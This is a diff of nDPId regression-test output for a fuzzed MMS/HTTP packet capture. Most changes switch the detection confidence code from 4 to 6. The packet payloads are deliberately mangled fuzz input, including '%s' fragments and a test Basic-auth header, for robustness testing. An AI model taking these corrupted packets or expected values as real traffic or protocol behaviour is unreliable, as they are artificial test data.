00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 
protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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\/8IgwWAMBAJCE3zKTS6yvWim2AQAaW9MjVBAFq9g49AEG3NPa5xSPjJCwdiuBGBzXCVzANBaejQlAgQt3KzJjOxe+tzME8YEwHMjOLJPC9RhIk1GBGcB9hyMVB+ymov9JgQcc+TIiquQD7ex2a4EwPA8+J0C0fnQHsHIBAJrIB2IKQBtWLyT3gRGCgMIhBG3oPgxOIIEYApux4qh3leJmGFmBAPwbXU1e9R22GaS9AQACnMDejLvmEUFMqwEnXCQ+IVVpDVVYOcgBAMm+YOVuf\/qr8C7EASdBxxFjGX+HDtZYUwEHBnMGjW5n+PI4knwBBsK4SmqTS8eSRtrYAQiJjP5kk8lcwBI1AgEHAoP2II8axveMUxCBBwKU3dDqfCKT69HlgQcGbBpzQqeNOKNF6oEwAEga4ImSmqwxRZQBFAp8rg96cDaFckq\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"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"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\/eG1sIHZlcnNpb249IjEuMCI\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"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -115,7 +115,7 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"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"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} 
@@ -127,16 +127,16 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} 01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\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"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":620000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 